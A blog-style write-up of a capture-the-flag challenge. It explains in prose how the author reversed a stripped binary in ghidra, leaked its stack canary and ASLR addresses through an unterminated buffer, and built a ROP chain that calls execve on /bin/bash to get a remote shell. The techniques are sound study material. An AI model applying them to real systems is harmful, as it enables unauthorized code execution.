Pwny Racing Community Challenge 7 Writeup

Published on 2019-11-13 by rkevin

I stumbled upon Pwny Racing a while when I was revisiting some of the challenges on OverTheWire to get inspiration for ECS189. Long story short, procrastination led to twitter led to stumbling upon Pwny Racing, which is a binary exploitation CTF. The Community Challenge section contains some publicly available challenges, and when I stumbled upon it the solvers under challenge 7 says TBD. Sounds interesting, might as well give it a shot!

Warning: This is gonna be ranty AF, and in retrospect I explained some stuff in waaaaay too much detail. Proceed with caution.

Initial analysis

We download the provided tar file, and there's the binary and information on how to connect to the remote server:

1

The binary is stripped, but that doesn't stop ghidra from doing its magic. After opening the binary in ghidra, we need to find the main function. In all gcc-compiled binaries, the entrypoint calls a function called __libc_start_main, and the first function is the main function:

2

Found it! Stripped symbols don't stop us. Let's rename this "main" and look at what's inside:

3

Hoo boy, there's a lot of stuff. First of all, what the heck is main doing taking in 11 arguments??? Oh right, because the symbols are stripped, ghidra has to guess what arguments each function takes, and it's not perfect (ghidra: I'm doing the best I can :C). We can help it out a bit by retyping main.

We know that usually the main function either take in zero arguments, two arguments (argc and argv) or three arguments (with an additional envp, for environment variables). We can just keep the first three arguments, retype them, and dump the rest:

4

Next up, there are two unknown functions inside main, currently named FUN_00100972 and FUN_001008da because ghidra doesn't know how to call them. What do they do?

5

The first function just prints out one message and returns, so we can just rename it print_welcome and call it a day.

We also see some __stack_chk_fail stuff. Oh god this binary has canaries. Uh oh. I'll explain later. What does the second function do?

6

It is called twice with argv and envp as arguments, which is kinda odd.

7

Hmm, lots of loops and 0s. The outermost if statement is just a sanity check to make sure the argument is not null. The outer loop looks like this:

1
2
3
4
5
6
local_20=argv;
while(local_20!=null){
local_18=*local_20; //getting the cur element from argv
loop_that_does_something_to_local_18;
local_20++; //next element
}

so it's safe to say this loop iterates over every element in the array of strings and doing something to it. What's the inner loop again?

8

Huh, okay, so it's zeroing out every element in argv and envp, along with destroying their pointers. This is probably to prevent us from using strings in the arguments and environment variables. Okay then, I'll rename the function clear because I'm the best at naming things. (/s)

9

Okay, time for the main dish! There's a lot of scary global variables here, but upon a closer look there are only two of them. DAT_0030202c gets assigned the return value of fgetc in the inner loop, so it probably holds the current character of the input. DAT_00302030 gets set to 0 at the start and increments every time the inner loop runs once, so it's probably a position counter. Once we rename it like that, the loop becomes a lot clearer:

10

The inner loop keeps reading characters from stdin until the input is -1(EOF), 10(\n), 0xd(\r) or if the input length exceeds 0x200. Every time it reads a character it puts it in local_58, which is a buffer that's 72 bytes long. Aha! We have found our vulnerability. This is a poor-man's fgets, but it reads 0x200 characters into a buffer with 72 bytes. Finally, if you give it an empty input, the program breaks out of the loop and returns.

Poking around, we also find an unused function:

11

Immediately, execve jumps out: This is our golden ticket to RCE! Looking closer at the arguments, we can see that if we pass in /bin/bash as param_3, we will get the shell we wanted! param_1 and param_2 are unused for some reason. Anyways, I'll name this function TARGET since it's the endgoal.

Battle plans

Now that we have the info we need and the goal in mind, we need to figure out a way to get there. Using the poor-man's gets we can overflow the stack and gain control of the instruction pointer, but the canary is in the way. Welp, time to face the issue at hand.

If you aren't aware, a stack canary is a value placed on the stack right before the return address. It's set to a randomized value at the start of the function and is compared against the right value at the end. If we're going to do a standard buffer overflow, in order to overwrite the return value we have to trample all over the canary, destroying its value. Once our attempt is detected by the canary, a function called __stack_chk_fail is called, and the program quits immediately. We need to either a) write to the return address without writing to the canary (probably impossible since we don't have an arbitrary write primitive) or b) find a way to leak the canary value, so when we bulldoze over the canary we can set it to the right value.

For now, let's assume we can bypass the canary somehow. We need to call TARGET with the right arguments. However, this is a 64 bit binary, and the arguments are stored in registers rather than on the stack. Ghidra tells us which arguments are in which registers:

12

We can't really touch registers just by writing on the stack, so we have to build some sort of ROP chain to get the argument in RDX. We also need to actually put the argument somewhere (we want to execute /bin/sh, so we have to give TARGET a pointer to that string). We can put /bin/sh in our input easily, but we need to leak the address of our input somehow, since this binary has ASLR enabled. We probably also need to leak the address of the text section, so we can know where to return to for our ROP chain. Finally, we have a battle plan:

  1. Leak the canary, buffer address and text address
  2. Put the string "/bin/bash" on the stack
  3. Build ROP chain to put the right address in rdx
  4. Call TARGET
  5. Profit!

Leaking addresses

While doing the challenge, I already have sort of an idea on how to find the canary. Before that, let's find the canary first. I'm using pwntools to write my exploit (it's awesome btw!), so let's write some boilerplate to talk to the program first.

From ghidra, I know this program is probably safe and won't just rm -rf / my system. When I run the program, this happens:

13

We can already see some interesting stuff happening, but let's ignore that for now. The program works exactly as expected. We can write code that recognizes the word 'buffer' and gives us the output. Let's try this:

14

It works! We can also get rid of the starting : output: and the trailing \n by just being lazy, counting the characters and hardcoding it. We can also write a function that does this for us:

15

Nice! Now we have a nice interface we can use to talk to the server. As you might've noticed, when we send 'abc', we get back some additional junk! ('abc4\xfc\x7f') It turns out that the poor-man's gets doesn't even try to put a trailing '\0' in the string. We can pretty much read anything we want to provided it doesn't contain '\0's! Let's find the canary first, and then we'll try to leak stuff.

We know the buffer is 72 characters, so what happens if we do 73?

16

Got it! We see a stack smashing detected message, so we know the canary has been triggered. The canary is right after our 72-byte buffer. We can also see leaked information after our output, so we have leaked the canary correctly except for the first byte! In addition, C canaries are hardcoded to start with a null character, so if someone forgets to null-terminate a string on the stack, the canary terminates it so no information gets leaked. Unfortunately for the canary, we can overwrite that one null character and just set it back to '\0' afterwards! Let's write the code to do that and see if it works or not. Let's also get rid of the r.interactive() and change it to just print everything out since we know we're just crashing the program:

17

Nice! Notice the SIGSEGV instead of the stack smashing detected message. This means we have successfully bypassed the canary! We can also examine some stuff using gdb (A nice trick: on systems with coredumpctl, you can run gdb on the most recently crashed program by simply typing coredumpctl debug):

18

Yep! The program segfaulted at a return, and the value on the stack is 0x4242424242424242, a bunch of 'B's. If we test further (or rely on the knowledge that the stack looks like [stack canary] [saved rbp] [return address]), we can figure out the return address is placed 8 bytes after the canary. Now we have control over the instruction pointer!

Well, that was very beneficial. Now that we have defeated the canary, we are one step closer to our goal! We leaked the canary from abusing the fact that our buffer isn't null terminated. Can we abuse anything else this way? Earlier on we noticed even when we entered a short string into the buffer, we still get random stuff from the end of our input. This is because the buffer wasn't zeroed out. Before main was run, a function called __libc_start_main was called, which sets everything up before main. This will call other functions as well and will definitely leave breadcrumbs on the stack. Let's see what we can find on the stack:

19

We see an address of some sort! It starts with 0x7ffe... so it looks like a stack address of some sort. Sure enough, if we fire up gdb and examine around that area...

20

... we see a bunch of Bs in that area! However, we had to overwrite the least significant bit to get it to print out. If we run this several times we will see that the LSB is not a constant, so while this is good enough to give us a 1/256 chance of getting the right address, can we do better? Let's leak all the stuff we can and see what happens. We only need to worry about stuff that's at an offset of a multiple of 8, since on a 64-bit machine, everything on the stack is aligned to 8 bytes:

21

We see a lot of interesting addresses there! Of course, this output is a bit hard to decipher (since Python tries to display printable characters as themselves rather than hex), so let's unpack it into a nice address for printing! Pwntools has utilities that does this nicely:

22

The unpack function takes in the bytes object and also how many bits it has (in our case 64 bits), and unpacks it as a little-endian unsigned integer (which is frankly what a pointer is under the hood). However, we aren't always getting 8 bytes cleanly every time, because if the address contains a '\0' we don't get everything after it. Let's just assume all the most significant bits are '\0' and pad the results we get to 8 bytes before unpacking:

23

Nice! We got some very nice values from the stack. From intuition, the ones that start with 0x7f are stack addresses, and the ones starting with 0x56 are addresses in the text section (in other words, executable code). Let's confirm what we're guessing is right first. I'll use the addresses at input offset 24 and 64, just because these were the ones I stumbled upon while solving it:

24

OK, if we check the instructions at the leaked text address, we get some add, cmp and jne instructions. If we check the leaked stack address minus 0x100, we find some 'A's and a bunch of 'B's that we were using to crash the program. 24 'A's, in fact. Let's run the program again and examine the results:

25

26

Nice! We see the pointers changing, but when we examine the instructions and memory they're pointing to, we find they are exactly the same as last time! We now know that they're stable, so if we find how offset they are to the things we care about (namely the base address of the text section, as well as the address of our input buffer), we can get their addresses!

Finding the base address of the buffer is easy enough. We already know that stack address minus 0x100 is in the middle of the buffer with 24 'A's, and we put 72 'A's in the buffer, so we need 72-24=48=0x30 more bytes. Our buffer should start at that address -0x130.

We know the address in the text section resolvs to an add rbx,0x1 instruction. Let's see if objdump can find it:

27

Found it! It's at offset 0xc1d from the base of the binary. That means if we get the leaked address and -0xc1d, we get to the base! Let's clean up our code a bit and grab the important addresses.

28

Nice! By the way, I made a change and converted the canary to an integer just to make things consistent, and cast it into a bytes object at the end using p64() (another utility provided by pwntools). Let's verify these addresses are actually right by examining them using gdb:

29

These look right! The text section starts with 0x464c457f (ELF header) and our buffer has 72 'A's in them. Now we have all the pieces of the puzzle and all that's left is to find the ROP chain!

ROP chain

Our ultimate goal is to call the TARGET function with the address of '/bin/bash' in the rdx register. I'm using ROPgadget to find any interesting ROP gadgets we can use. We're looking for something to put stuff in rdx.

30

Ah, crap. There are no usable gadgets! Is the program working?

31

It's working alright, there just arent good gadgets for rdx. In retrospect, the reason why TARGET ignores the first two arguments and force us to use the third is probably to force the use of rdx and annoying us. We need a better solution.

20 minutes of manual searching for gadgets in objdump later

UGH! This is taking forever! Does ROPgadget have options for this?

32

.

33

Of course, it wouldn't be me if I didn't overlook something simple that would save tons of agony. Oh well. What if we bump up the depth?

34

Finally, some actually usable gadgets! The one at 0xc10 seems interesting, which moves r15 into rdx. If we can figure out a way to write to r15 we can get to rdx! There's a slight caveat, because at the end it's not a normal ret instruction. Instead, it's doing call qword ptr [r12 + rbx*8]. We need to put the return address somewhere on the stack (which we can do since we know the buffer's address!), and modidfy r12 and rbx to point there. Mental checklist: we need to modify r15, r12 and rbx. Is there a gadget for r15?

35

Wow, we got insanely lucky! Not only is there a gadget to write to r15, it also changes r12 and rbx. Just what we need! Finally, let's construct the ROP chain:

  1. Return to text+0xc2a (pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret)
  2. Pop the values into the registers: rbx=0, rbp=0, r12=X, r13=0, r14=0, r15=Y
  3. Return to text+0xc10 (mov rdx, r15 ; mov rsi, r14 ; mov edi, r13d ; call qword ptr [r12 + rbx*8])
  4. rdx=r15=Y, rsi=0, edi=0, call the address located at (r12+rbx*8=X+0=X)

Therefore, if we set Y to point to the string '/bin/bash', and X to point to a pointer (note the double pointer!) that contains the address of TARGET, we win!

Putting it all together

After leaking all the important info, we want to send this exploit string:

36

Finally, we send an empty line to trigger the exploit. Let's see if it's successful:

37

It works! We now have a shell! Now the last step we need to do is to exploit it on the actual remote machine. In the packet we downloaded there is a file telling us the hostname and port to connect to. One of the major benefits of pwntools is once you finish developing the exploit on a local binary, you can just swap out r=process() with r=remote() and your exploit now talks to the remote server instead!

38

And just like that, we got the flag!

A quick note, this exploit does have a slight chance of failing, just in case the canary or a pointer we're trying to leak has a pesky \0 or \n in it. If that happens, just run it again. My exploit code is downloadble here and I might submit a pull request once I get the OK for it now available on Github.

I'm not sure when the challenge is posted (I stumbled upon it at around 5PM Oct 27th PST), so it's very likely the challenge has been posted for a while and I'm not the first one to solve it. Regardless, I only took less than 2 hours to solve it so I'm pretty damn proud of myself, especially since I don't have a lot of binary exploitation experience and I was so sure this is out of my league when I saw ASLR and stack canaries were enabled. This has been a very fun experience and I'd like to solve all the other challenges there eventually (read as: once I want to procrastinate on homework again). Definitely check out Pwny Racing and their community challenge section!